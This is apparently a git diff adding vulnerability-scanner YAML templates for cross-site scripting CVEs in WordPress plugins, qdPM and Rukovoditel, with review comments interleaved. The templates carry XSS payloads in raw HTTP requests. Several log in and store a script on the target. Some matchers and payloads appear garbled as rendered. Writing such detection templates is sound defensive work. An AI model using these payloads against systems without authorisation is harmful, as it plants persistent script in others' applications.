diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml new file mode 100644 index 0000000000..fa9427a85d --- /dev/null +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -0,0 +1,42 @@ +id: CVE-2019-14789 + +info: + name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd + - https://wordpress.org/plugins/custom-404-pro/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-14789 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-14789 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "")' + - 'contains(body_2, "Custom 404 Pro")' + condition: and diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml new file mode 100644 index 0000000000..51c9b057d1 --- /dev/null +++ b/http/cves/2019/CVE-2019-8390.yaml 
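Review bot: The tags line in the info block reads `cve,cve2023,custom-404-pro,...` for a 2019 CVE; the year tag should be `cve2019` to match the `id` and the other templates in this commit. The `name` says `< 3.2.8` while the description says `before 3.2.9`, and the description names the `title` parameter while the request injects via `s=`; both should be reconciled against the wpscan reference. As rendered here the matcher `contains(body_2, "")` tests for an empty string, which is always true, so the reflected-payload check does nothing; this may be rendering loss of the expected marker, but the same empty-string check appears in every other template of this commit, so the committed files should be confirmed to carry the real reflected string. The qdPM and several Rukovoditel templates declare `max-request` under metadata; `max-request: 2` would make this one consistent with its two raw requests.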
@@ -0,0 +1,70 @@ +id: CVE-2019-8390 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + reference: + - https://www.exploit-db.com/exploits/46399/ + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2019-8390 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-8390 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + max-request: 3 + tags: cve,cve2019,xss,qdpm,authenticated,edb + +http: + - raw: + - | + GET /index.php/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer= + + - | + POST /index.php/users HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + search[keywords]=e">&search_by_extrafields[]=9 + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'alert alert-info alert-search-result' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'name="login\[_csrf_token\]" value="(.*?)"' + internal: true diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml new file mode 100644 index 0000000000..ad8ee4f768 --- /dev/null +++ b/http/cves/2020/CVE-2020-19515.yaml 
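Review bot: The word matcher's first entry `- ''` is an empty string, which matches any body, so the body check reduces to `alert alert-info alert-search-result` alone; as rendered here the payload in `search[keywords]=e">` also looks cut off, so the committed file should be checked to carry both the full payload and its expected reflection in the words list. The `name` is identical to the one in CVE-2020-19515.yaml in this same commit (`qdPM 9.1 - Cross-site Scripting`); naming the injection point, e.g. `qdPM 9.1 - Cross-site Scripting (search keywords)`, keeps the two distinguishable in output. Nothing verifies that the login in the second request succeeded before the third request is sent, so a wrong credential pair yields a silent non-match rather than an error; a comment above the `raw:` block such as `# requires valid {{username}}/{{password}} for a qdPM account` would make that expectation explicit.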
@@ -0,0 +1,44 @@ +id: CVE-2020-19515 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + reference: + - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2020-19515 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-19515 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + tags: cve,cve2020,xss,qdpm,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php?step=database_config&db_error=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'qdPM' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml new file mode 100644 index 0000000000..77ae78f15d --- /dev/null +++ b/http/cves/2020/CVE-2020-35984.yaml 
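Review bot: The first `words` entry `- ''` is empty and therefore matches any body, leaving `qdPM` as the only body check; as rendered here the `db_error=` value in the path is also empty, so the committed template should be confirmed to carry the reflected marker in both places. A positive match here also means `/install/` is still reachable on a deployed instance, which is a finding in its own right; a remediation line in the description, e.g. `Remove or restrict the install directory after setup.`, would make that clear to consumers of the output. The `name` duplicates the one in CVE-2019-8390.yaml (`qdPM 9.1 - Cross-site Scripting`); naming the installer step, e.g. `qdPM 9.1 - Cross-site Scripting (installer database_config)`, would distinguish them.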
@@ -0,0 +1,60 @@ +id: CVE-2020-35984 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35984 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35984 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml new file mode 100644 index 0000000000..06f833058c --- /dev/null +++ b/http/cves/2020/CVE-2020-35985.yaml 
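Review bot: In the third request body the parameter before `test` is rendered here as `¬es=test`, which reads like `&notes=test` after HTML-entity decoding of `&not`; the committed file should be checked to contain the literal `&notes=`, since a `¬` byte would corrupt the form field (the same rendering appears in CVE-2020-35985, -35986, -35987, CVE-2022-43164, -43165, -43166, -43169 and -44947, and `§ions_id` in CVE-2022-43170 looks like `&sections_id` with the same issue). This template and the other Rukovoditel stored-XSS templates in this commit persist a `<script>` entry on the target by calling `action=save`; a comment above the third request, e.g. `# stored: creates a user alert containing the payload; remove it after testing`, would tell operators about the cleanup they owe. `verified: "true"` is a quoted string here (also in CVE-2020-35986, CVE-2022-43164 and CVE-2022-43167) while the other templates use the bare boolean `true`; the bare form is the consistent one. The nonce extractor uses the greedy `value="(.*)"`; the non-greedy `value="(.*?)"` as used in CVE-2019-8390.yaml avoids overmatching if another quoted attribute follows on the same line.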
@@ -0,0 +1,59 @@ +id: CVE-2020-35985 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35985 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35985 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml new file mode 100644 index 0000000000..a532006a00 --- /dev/null +++ b/http/cves/2020/CVE-2020-35986.yaml 
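Review bot: The description's feature name is quoted as `'Global Lists"` with mismatched quote characters; `'Global Lists'` matches the style of the sibling descriptions. The metadata block omits `shodan-query` and `max-request`, both of which the otherwise identical CVE-2020-35984.yaml and CVE-2020-35986.yaml carry; `shodan-query: http.favicon.hash:-1499940355` and `max-request: 3` would keep the family consistent. The same omission applies to CVE-2020-35987.yaml.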
@@ -0,0 +1,60 @@ +id: CVE-2020-35986 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35986 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35986 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml new file mode 100644 index 0000000000..32b3c05c29 --- /dev/null +++ b/http/cves/2020/CVE-2020-35987.yaml 
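Review bot: The dsl matcher checks status, the body marker and `rukovoditel` but not the response content type, while the sibling templates CVE-2020-35985.yaml and CVE-2020-35987.yaml add `'contains(content_type_3, "text/html")'`; without it a JSON or plain-text echo of the saved name would also count as a match. Adding that line to the dsl list keeps the family consistent. The same omission is in CVE-2019-14789.yaml, CVE-2022-43164.yaml and CVE-2022-43167.yaml.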
@@ -0,0 +1,59 @@ +id: CVE-2020-35987 + +info: + name: Rukovoditel <= 2.7.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35987 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35987 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml new file mode 100644 index 0000000000..ccecc02849 --- /dev/null +++ b/http/cves/2022/CVE-2022-4295.yaml 
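Review bot: The extractor lists `internal: true` before `group: 1` whereas the other Rukovoditel templates in this commit put `internal: true` last; this is ordering only, but aligning it makes the family easier to diff (the same ordering is in CVE-2022-43169, -43185, -44946 and -44948). The third request posts to `module=entities/` with an empty sub-module while the description names the 'Entities List' feature; if that is the real save handler, a short comment above the request, e.g. `# entities/ with no sub-module is the entity save handler`, would stop readers from treating it as a typo.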
@@ -0,0 +1,34 @@ +id: CVE-2022-4295 + +info: + name: Show all comments < 7.0.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + reference: + - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56 + - https://nvd.nist.gov/vuln/detail/CVE-2022-4295 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-4295 + cwe-id: CWE-79 + metadata: + verified: true + publicwww-query: /wp-content/plugins/show-all-comments-in-one-page + tags: cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "Select ")' + condition: and diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml new file mode 100644 index 0000000000..a6bb6ff6d1 --- /dev/null +++ b/http/cves/2022/CVE-2022-43164.yaml 
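Review bot: `contains(body, "")` is always true, and the next check `contains(body, "Select ")` ends in a trailing space inside the quotes, which suggests the reflected marker following `Select` was lost in rendering; the committed file should be checked so that the body check actually tests for the reflected `post_type` value. The description says the bug is used against logged-in high-privilege users, yet the request is a single unauthenticated GET to `admin-ajax.php` and the tags carry no `authenticated`; if the ajax action is reachable without a session that is fine, but a sentence in the description stating that the template needs no credentials would avoid confusion. A `max-request: 1` under metadata would match the single request as other templates in this commit declare theirs.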
@@ -0,0 +1,61 @@ +id: CVE-2022-43164 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43164 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43164 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml new file mode 100644 index 0000000000..40009003ab --- /dev/null +++ b/http/cves/2022/CVE-2022-43165.yaml 
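Review bot: The `name` `Rukovoditel <= 3.2.1 - Cross Site Scripting` is reused verbatim (modulo the hyphen in `Cross-Site`) by CVE-2022-43165, -43166, -43167, -43169, -43170, -43185, -44944, -44946, -44947 and -44948 in this commit, so eleven findings print indistinguishably; appending the affected feature, e.g. `Rukovoditel <= 3.2.1 - Cross Site Scripting (Global Lists)`, keeps output readable. The hyphenation of `Cross Site` versus `Cross-Site` also varies across those names and should be made uniform. Here the description path `/index.php?module=global_lists/lists` and the request's `module=global_lists/lists&action=save` agree, which is not the case for every sibling.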
@@ -0,0 +1,60 @@ +id: CVE-2022-43165 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + reference: + - https://github.com/anhdq201/rukovoditel/issues/5 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43165 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43165 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml new file mode 100644 index 0000000000..850177753b --- /dev/null 
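Review bot: `http:` follows the `tags:` line directly with no blank line, unlike the other templates in this commit; the same is true of CVE-2022-43167, -43169, -43185 and -44948. The metadata block has `shodan-query` but no `max-request`, while the sibling CVE-2022-43164.yaml declares `max-request: 3` for the same three-request flow; adding `max-request: 3` aligns them (the same omission is in -43166, -43169, -43170, -43185, -44944, -44946, -44947 and -44948).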
+++ b/http/cves/2022/CVE-2022-43166.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43166 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + reference: + - https://github.com/anhdq201/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43166 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43166 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml new file mode 100644 index 0000000000..c540b4ae99 --- /dev/null 
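Review bot: The description places the feature at `/index.php?module=entities/entities`, but the third request posts to `module=entities/&action=save&token=...` with an empty sub-module; the same `module=entities/` form is used in CVE-2020-35987.yaml, so it is presumably the real save handler, but the description and request should name the same path or the description should say why they differ. The body sends `group_id=` empty; if the save handler rejects a missing group the payload is never stored and the `body_3` marker check fails silently, which is worth confirming against the referenced issue. The metadata block also lacks the `shodan-query: http.favicon.hash:-1499940355` that CVE-2022-43164.yaml and CVE-2022-43165.yaml carry for the same product (likewise -43169, -43170, -43185 and -44948).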
+++ b/http/cves/2022/CVE-2022-43167.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43167 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/7 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43167 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43167 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true 
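Review bot: CVE-2020-35984.yaml, which targets the same `users_alerts/users_alerts&action=save` endpoint, sends the payload as `name=` while this template sends `title=` (with `type`, `location`, `start_date` and `end_date` alongside); the form field name is unlikely to differ between 2.7.2 and 3.2.1 in that way, so one of the two bodies should be verified against its issue reference. If both are correct for their respective versions, a comment above the third request such as `# 3.2.1 form uses title= for the alert title` would record why the two templates diverge.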
diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml new file mode 100644 index 0000000000..d9e2414971 --- /dev/null +++ b/http/cves/2022/CVE-2022-43169.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2022-43169 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + reference: + - https://github.com/anhdq201/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43169 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43169 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml new file mode 100644 index 0000000000..3487ba0aea --- /dev/null 
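Review bot: This template posts the same payload to the same `users_groups/users_groups&action=save` Name field that CVE-2020-35986.yaml already exercises, so a 3.2.1 instance is reported twice under two CVE ids; that is expected given the separate assignments but should be stated in the description, e.g. `Same injection point as CVE-2020-35986 on the 2.7.2 branch.` The same pairing exists for CVE-2022-43164 with CVE-2020-35985 (Global Lists), CVE-2022-43166 with CVE-2020-35987 (Entities) and CVE-2022-43167 with CVE-2020-35984 (Users Alerts). The body also sends an empty `ldap_filter=`; a comment noting that it is presumably a required form field would explain its presence.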
